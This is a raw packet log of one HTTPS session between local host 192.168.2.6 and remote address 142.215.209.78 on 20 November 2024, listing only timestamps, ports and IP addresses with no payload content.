Nov 20, 2024 08:28:12.050664902 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.050719976 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.050734043 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.050998926 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.051034927 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.051079035 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.051090002 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.051126003 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.051244020 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.051294088 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.051306009 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.051465034 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.051517010 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.051533937 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.051706076 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.051747084 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.051774979 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.051781893 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.051803112 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.052043915 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.052097082 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.052103043 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.052119017 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.052158117 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.052192926 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.052201033 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.052233934 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.099242926 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.140608072 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.140672922 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.140717983 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.140752077 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.140777111 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.140825987 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.140840054 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.140840054 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.140853882 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.140877008 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.140924931 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.140935898 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.141036987 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.141045094 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.141086102 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.141144037 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.141151905 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.141345024 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.141513109 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.141520977 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.141836882 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.141978979 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.141989946 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.142088890 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.142141104 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.142195940 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.142195940 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.142205000 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.142332077 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.142389059 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.142406940 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.142414093 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.142437935 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.142493963 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.142493963 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.142504930 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.142575979 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.142616034 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.142632961 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.142640114 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.142712116 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.187304974 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.187428951 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.187448978 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.212146044 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.231151104 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.231252909 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.231270075 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.231337070 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.231374025 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.231424093 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.231424093 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.231434107 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.231532097 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.231584072 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.231590986 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.231739998 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.231796026 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.231803894 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.231856108 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.231865883 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.231919050 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.231924057 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.232078075 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.232156038 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.232161999 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.232223034 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.232300997 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.232307911 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.232352972 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.232426882 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.232434034 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.232506990 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.232578993 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.232585907 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.232784033 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.232884884 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.232892990 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.232904911 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.232966900 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.232973099 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.233057022 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.233133078 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.233156919 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.233165979 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.233247042 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.233288050 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.233385086 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.233392000 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.235244989 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.277972937 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.278182983 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.278209925 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.278665066 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.321989059 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.322047949 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.322088003 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.322097063 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.322190046 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.322225094 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.322231054 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.322244883 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.322321892 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.322371006 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.322371006 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.322377920 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.322830915 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.322861910 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.322902918 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.322942972 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.322953939 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.322953939 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.322962046 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.323009968 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.323016882 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.323177099 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.323223114 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.323235989 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.323241949 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.323268890 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.323299885 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.323307991 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.323329926 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.323646069 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.323858023 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.323896885 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.323904037 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.323904991 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.323913097 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.323937893 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.323993921 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.324028969 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.324043036 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.324043036 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.324057102 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.324074030 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.324187994 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.326745033 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.368702888 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.368927002 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.368943930 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.412951946 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.413026094 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.413042068 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.413168907 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.413242102 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.413252115 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.413383961 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.413463116 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.413470030 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.413634062 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.413706064 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.413713932 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.413880110 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.413928986 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.413937092 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.414114952 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.414202929 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.414211988 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.414376974 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.414433956 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.414441109 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.414617062 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.414721966 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.414731979 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.414808989 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.414894104 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.414902925 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.415122032 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.415204048 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.415210962 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.415280104 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.415329933 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.415335894 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.415513039 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.415680885 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.415714979 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.415725946 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.415746927 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.415860891 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.415986061 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.415993929 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.416063070 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.416168928 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.416176081 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.419117928 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.459423065 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.459531069 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.459546089 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.503616095 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.503668070 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.503751040 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.503766060 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.503782988 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.503809929 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.503845930 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.503858089 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.503958941 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.504035950 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.504045963 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.504141092 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.504189968 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.504196882 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.504240036 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.504303932 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.504311085 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.504440069 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.504512072 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.504545927 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.504554033 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.504566908 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.504736900 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.504848003 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.504858017 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.504867077 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.504924059 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.504931927 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.504967928 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.505100012 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.505170107 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.505177975 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.505218983 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.505273104 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.505280018 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.505302906 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.505393982 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.505400896 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.505530119 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.505600929 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.505609989 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.505676985 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.505769014 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.505780935 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.550301075 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.550488949 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.550512075 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.592555046 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.594434977 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.594489098 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.594516039 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.594530106 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.594544888 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.594563007 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.594563007 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.594577074 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.594603062 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.594655991 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.594764948 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.594814062 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.594841003 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.594849110 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.594862938 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.594916105 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.594953060 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.595072031 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.595079899 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.595093012 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.595164061 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.595164061 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.595174074 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.595285892 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.595397949 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.595405102 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.595452070 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.595534086 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.595556021 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.595563889 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.595637083 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.595854044 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.595901012 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.595912933 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.595922947 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.596019983 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.596048117 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.596093893 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.596101999 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.596232891 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.596314907 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.596323013 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.596359015 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.596402884 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.596410990 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.641143084 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.641248941 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.641269922 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.685287952 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.685348034 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.685388088 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.685405970 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.685425997 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.685440063 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.685477018 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.685494900 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.685502052 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.685512066 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.685652018 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.685659885 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.685719013 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.685769081 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.685779095 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.685873985 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.685920954 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.685923100 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.685935020 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.686065912 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.686074018 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.686181068 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.686187029 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.686218023 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.686443090 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.686449051 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.686630964 CET	443	49725	142.215.209.78	192.168.2.6
